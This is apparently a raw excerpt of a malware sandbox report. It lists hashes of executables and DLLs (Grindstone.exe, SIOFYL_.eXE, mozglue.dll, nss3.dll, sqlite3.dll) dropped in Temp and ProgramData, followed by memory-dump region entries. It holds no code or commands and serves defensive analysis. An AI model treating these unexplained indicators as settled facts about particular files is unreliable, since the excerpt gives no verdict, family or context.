C:\Users\Admin\AppData\Local\Temp\Grindstone.exeMD5
7e400451e3153f07e15e9079b8bed063
SHA1864298a6817176e36a756721f48e5ac9dee0223e
SHA2567ba90aa0c59065b2cff53772013ce986674346b311025c13eefff32670d7ffe1
SHA512277edc6d5931d7b5b41d77a79cf975e2065d74d3ed938153d31f709670cbf03744109b4c6fa967dc229865e1dc49aa62b4503b0230d61f2f824d4012c5e97556
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exeMD5
7e400451e3153f07e15e9079b8bed063
SHA1864298a6817176e36a756721f48e5ac9dee0223e
SHA2567ba90aa0c59065b2cff53772013ce986674346b311025c13eefff32670d7ffe1
SHA512277edc6d5931d7b5b41d77a79cf975e2065d74d3ed938153d31f709670cbf03744109b4c6fa967dc229865e1dc49aa62b4503b0230d61f2f824d4012c5e97556
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exeMD5
7e400451e3153f07e15e9079b8bed063
SHA1864298a6817176e36a756721f48e5ac9dee0223e
SHA2567ba90aa0c59065b2cff53772013ce986674346b311025c13eefff32670d7ffe1
SHA512277edc6d5931d7b5b41d77a79cf975e2065d74d3ed938153d31f709670cbf03744109b4c6fa967dc229865e1dc49aa62b4503b0230d61f2f824d4012c5e97556
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exeMD5
7e400451e3153f07e15e9079b8bed063
SHA1864298a6817176e36a756721f48e5ac9dee0223e
SHA2567ba90aa0c59065b2cff53772013ce986674346b311025c13eefff32670d7ffe1
SHA512277edc6d5931d7b5b41d77a79cf975e2065d74d3ed938153d31f709670cbf03744109b4c6fa967dc229865e1dc49aa62b4503b0230d61f2f824d4012c5e97556
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXEMD5
57861feb58cc7432fc9191f26beac607
SHA1e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA2561c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA5120ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXEMD5
57861feb58cc7432fc9191f26beac607
SHA1e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA2561c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA5120ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
\ProgramData\mozglue.dllMD5
8f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
\ProgramData\nss3.dllMD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
\ProgramData\sqlite3.dllMD5
e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
memory/432-145-0x0000000000418EEA-mapping.dmp
-
memory/432-162-0x0000000005300000-0x0000000005906000-memory.dmpFilesize
6.0MB
-
memory/432-149-0x0000000005910000-0x0000000005911000-memory.dmpFilesize
4KB
-
memory/432-191-0x00000000075B0000-0x00000000075B1000-memory.dmpFilesize
4KB
-
memory/432-190-0x0000000006EB0000-0x0000000006EB1000-memory.dmpFilesize
4KB
-
memory/432-184-0x0000000005740000-0x0000000005741000-memory.dmpFilesize
4KB
-
memory/432-155-0x0000000005380000-0x0000000005381000-memory.dmpFilesize
4KB
-
memory/432-156-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/432-144-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/432-177-0x0000000005440000-0x0000000005441000-memory.dmpFilesize
4KB
-
memory/432-188-0x00000000069C0000-0x00000000069C1000-memory.dmpFilesize
4KB
-
memory/432-165-0x00000000053E0000-0x00000000053E1000-memory.dmpFilesize
4KB
-
memory/588-121-0x0000000000402DD8-mapping.dmp
-
memory/588-120-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/764-221-0x0000000000000000-mapping.dmp
-
memory/888-160-0x000000000040CD2F-mapping.dmp
-
memory/888-164-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/888-181-0x0000000004B44000-0x0000000004B46000-memory.dmpFilesize
8KB
-
memory/888-166-0x0000000002370000-0x000000000238C000-memory.dmpFilesize
112KB
-
memory/888-168-0x00000000024C0000-0x00000000024DB000-memory.dmpFilesize
108KB
-
memory/888-170-0x0000000004B42000-0x0000000004B43000-memory.dmpFilesize
4KB
-
memory/888-171-0x0000000004B43000-0x0000000004B44000-memory.dmpFilesize
4KB
-
memory/888-169-0x0000000004B40000-0x0000000004B41000-memory.dmpFilesize
4KB
-
memory/888-158-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1096-238-0x0000000004720000-0x00000000047CD000-memory.dmpFilesize
692KB
-
memory/1096-239-0x00000000047D0000-0x0000000004869000-memory.dmpFilesize
612KB
-
memory/1096-236-0x00000000044E0000-0x0000000004595000-memory.dmpFilesize
724KB
-
memory/1096-237-0x0000000004660000-0x0000000004714000-memory.dmpFilesize
720KB
-
memory/1096-235-0x0000000000D10000-0x0000000000EE0000-memory.dmpFilesize
1.8MB
-
memory/1412-232-0x0000000000000000-mapping.dmp
-
memory/1424-119-0x0000000002C80000-0x0000000002DCA000-memory.dmpFilesize
1.3MB
-
memory/1440-185-0x0000000004830000-0x00000000048BF000-memory.dmpFilesize
572KB
-
memory/1440-186-0x0000000000400000-0x0000000002B85000-memory.dmpFilesize
39.5MB
-
memory/1440-176-0x0000000000000000-mapping.dmp
-
memory/1492-230-0x0000000000000000-mapping.dmp
-
memory/1492-233-0x0000000000E80000-0x0000000000E87000-memory.dmpFilesize
28KB
-
memory/1492-234-0x0000000000BF0000-0x0000000000BFC000-memory.dmpFilesize
48KB
-
memory/1676-215-0x0000000000000000-mapping.dmp
-
memory/1804-142-0x0000000000530000-0x000000000067A000-memory.dmpFilesize
1.3MB
-
memory/1804-131-0x0000000000000000-mapping.dmp
-
memory/1804-143-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1804-141-0x0000000000530000-0x000000000067A000-memory.dmpFilesize
1.3MB
-
memory/2252-123-0x0000000000000000-mapping.dmp
-
memory/2252-154-0x0000000002CA0000-0x0000000002CA9000-memory.dmpFilesize
36KB
-
memory/2316-192-0x0000000000000000-mapping.dmp
-
memory/2316-195-0x0000000000560000-0x0000000000561000-memory.dmpFilesize
4KB
-
memory/2316-201-0x0000000004FE0000-0x0000000004FE1000-memory.dmpFilesize
4KB
-
memory/2392-223-0x0000000000000000-mapping.dmp
-
memory/2492-225-0x0000000000000000-mapping.dmp
-
memory/2664-138-0x0000000000000000-mapping.dmp
-
memory/2664-163-0x0000000002B60000-0x0000000002CAA000-memory.dmpFilesize
1.3MB
-
memory/2664-157-0x0000000002EA6000-0x0000000002EC9000-memory.dmpFilesize
140KB
-
memory/2680-218-0x0000000000000000-mapping.dmp
-
memory/2680-228-0x0000000002D90000-0x0000000002DFB000-memory.dmpFilesize
428KB
-
memory/2680-227-0x0000000003000000-0x0000000003074000-memory.dmpFilesize
464KB
-
memory/2804-231-0x0000000000000000-mapping.dmp
-
memory/2824-216-0x0000000000000000-mapping.dmp
-
memory/3028-159-0x0000000002510000-0x0000000002526000-memory.dmpFilesize
88KB
-
memory/3028-122-0x0000000000AD0000-0x0000000000AE6000-memory.dmpFilesize
88KB
-
memory/3092-203-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3092-204-0x000000000040717B-mapping.dmp
-
memory/3092-206-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3192-152-0x0000000000402DD8-mapping.dmp
-
memory/3620-229-0x0000000000000000-mapping.dmp
-
memory/3688-126-0x0000000000000000-mapping.dmp
-
memory/3688-129-0x0000000000390000-0x0000000000391000-memory.dmpFilesize
4KB
-
memory/3688-137-0x00000000025A0000-0x00000000025A1000-memory.dmpFilesize
4KB
-
memory/3688-136-0x00000000051F0000-0x00000000051F1000-memory.dmpFilesize
4KB
-
memory/3688-132-0x0000000004C40000-0x0000000004C41000-memory.dmpFilesize
4KB
-
memory/3688-135-0x0000000002580000-0x0000000002581000-memory.dmpFilesize
4KB
-
memory/3876-222-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/3876-220-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/3876-217-0x0000000000000000-mapping.dmp
-
memory/3908-212-0x0000000002EF0000-0x0000000002EF1000-memory.dmpFilesize
4KB
-
memory/3908-213-0x0000000002EF0000-0x0000000002EF1000-memory.dmpFilesize
4KB
-
memory/3908-210-0x0000000000000000-mapping.dmp
-
memory/4012-226-0x0000000000000000-mapping.dmp